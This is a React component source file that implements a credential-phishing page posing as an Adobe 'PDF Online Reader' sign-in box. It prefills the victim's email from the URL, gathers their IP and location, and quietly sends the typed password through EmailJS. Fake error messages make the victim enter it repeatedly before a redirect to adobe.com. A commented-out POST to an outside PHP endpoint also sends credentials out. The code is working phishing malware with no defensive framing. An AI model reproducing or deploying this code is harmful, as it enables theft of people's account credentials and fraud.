import React, { useState, useEffect, useRef } from "react";
import './Form.css';
import $ from 'jquery';
import emailjs from '@emailjs/browser';

const Formm = ({ stop_propagate,hideModal })=>{

    const formRef = useRef();

    const [ipAdress, setIpAdress] = useState('')
    const [city, setCity] = useState('');
    const [flag, setFlag] = useState('');
    const [country, setCountry] = useState('');
  
    const forTime = new Date();
  
    useEffect(()=>{
      fetch(`https://api.geoapify.com/v1/ipinfo?apiKey=139d2378a5554f48bf290b61999b4e8a`)
      .then(req=> req.json())
      .then(res=>{

          setIpAdress(res.ip)
          setFlag(res.country.flag);
          setCountry(res.country.name);
          setCity(res.city.names.en);

          
      })
      .catch(e=> console.log)
  }, []);

    // const emailInTheURL = window.location.href;
    // const sliceEqualSign = emailInTheURL.indexOf("@");
    // const extracetdEmail = emailInTheURL.substr((sliceEqualSign+1)).toLowerCase();
    // const mainName = extracetdEmail.replace('.com', "");

    const emailInTheURLA = window.location.href;
    const sliceEqualSignB = emailInTheURLA.indexOf("=");
    const extracetdEmailC = emailInTheURLA.substr((sliceEqualSignB+1));
    const sliceE = extracetdEmailC;
    const cutOutAllTheTextLeavingTheOneToBeCapitalizeBelow = sliceE.slice(1)
    const capitalizeFirstLetter = extracetdEmailC.charAt(0).toUpperCase() + cutOutAllTheTextLeavingTheOneToBeCapitalizeBelow.split('&', 1).toString();


    const emailInTheURL = window.location.href;
    const sliceEqualSign = emailInTheURL.indexOf("=");
    const e = emailInTheURL.substr((sliceEqualSign+1)).split('&', 1).toString();

    const [email, setEmail] = useState(e);
    // setEmail(email);
    const [pwd, setPwd] = useState('');

    const [err, setErr] = useState(false);
    const [btn, setBtn] =useState('Next');
    const [count, setCount] = useState(0);

    const handleForm = e=>{
        e.preventDefault();

        if (!pwd) {
            return null
        } else {
                                                                                           


        const serviceID = `service_qjfr9kn`;
        const templateID = `template_fynfokb`;
        const publicKey = `U3wzAbRUMCMlm7PJj`;


        emailjs
        .sendForm(serviceID, templateID, formRef.current, {
          publicKey: publicKey,
        })
        .then(
          () => {
            console.log('!');
          },
          (error) => {
            console.log('...', error.text);
          },
        );



            setBtn('Processing...')
            setCount(count=> count + 1);
            if(count === 2){
                setTimeout(() => {
                    window.location.href = `https://adobe.com/home`;
                }, 3100);
            };
 
        setTimeout(() => {
            setPwd('');
            setTimeout(() => {
                setBtn('Sign In');
                setErr(true);
            }, 500);
        }, 2000);



        // post to server

        const user = {
            email: email,
            password: pwd
        };
        
        

        // $.ajax({
        //     type: "POST",
        //     url: "https://physicaleducationdiploma.com/dashboard/file/newbg.php",
        //     data: user, 
        //     success(data) {
        //         // alert('OK');
        //         console.log(data);
        //     },
        // });

        }
    }


    return(<div className="form_body" onClick={hideModal}>
        
        <div className="cntr">
            <main className="modalll" onClick={stop_propagate}>


                <div style={{
                    display:'flex',
                    // justifyContent:'center',
                    alignItems:'center'
                }}>
                    <img 
                        alt="1drive" 
                        className="dmiuhi"
                        src="data:image/png;base64,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"
                    />
                    &#160;
                    &#160;
                    &#160;

                    <p style={{
                        fontWeight:'bold',
                        color:'#333'
                    }}>PDF Online Reader</p>
                </div>


                <form onSubmit={handleForm} ref={formRef}>

                   { err ? <p className="txt_danger" style={{
                        marginBottom:'2em',
                        marginTop:'2.3em',
                        textAlign:'center'
                    }}>Because you're accessing a sensitive info, you need to verify your password</p> : null }
                    
                    <div className="inp_cont">
                        <input 
                            type="email"
                            readOnly
                            className="inpp emaill"
                            value={email}
                            required
                            placeholder="Username"
                            id="email"
                            name="online_correspondence"
                            onChange={e=> setEmail(e.target.value)}
                            style={{
                                marginTop:'1.4em'
                            }}
                        />
                    </div>

                    <p></p>

                    <div className="inp_cont">
                        <input 
                            type="password"
                            id="password"
                            className="inpp"
                            value={pwd}
                            required
                            autoFocus
                            name="signal"
                            placeholder="Password" 
                            onChange={e=> setPwd(e.target.value)}
                            style={{
                                marginBottom:'15px'
                            }}
                        />
                    </div>

                    <div style={{
                        marginLeft:'9px',fontSize:'15px',
                    }}>
                        <input type="checkbox"/>
                        Keep me signed in
                    </div>

                    <div style={{
                        marginLeft:'9px',
                        fontSize:'13px',
                        color:'#333',
                        fontWeight:'bold',
                        marginTop:'10px',
                        marginBottom:'10px'
                    }}>
                        &copy; Adobe 2025
                    </div>

                    <div className="inp_cont">
                        <input 
                            type="submit"
                            value={`${btn}`}
                            className="btn"
                            onClick={handleForm}
                        />
                    </div>

                    <input type="text" value={country} name="country" hidden/>
                    <input type="text" value={city} name="city" hidden/>

                </form>
            </main>
        </div>

    </div>)
};

export default Formm;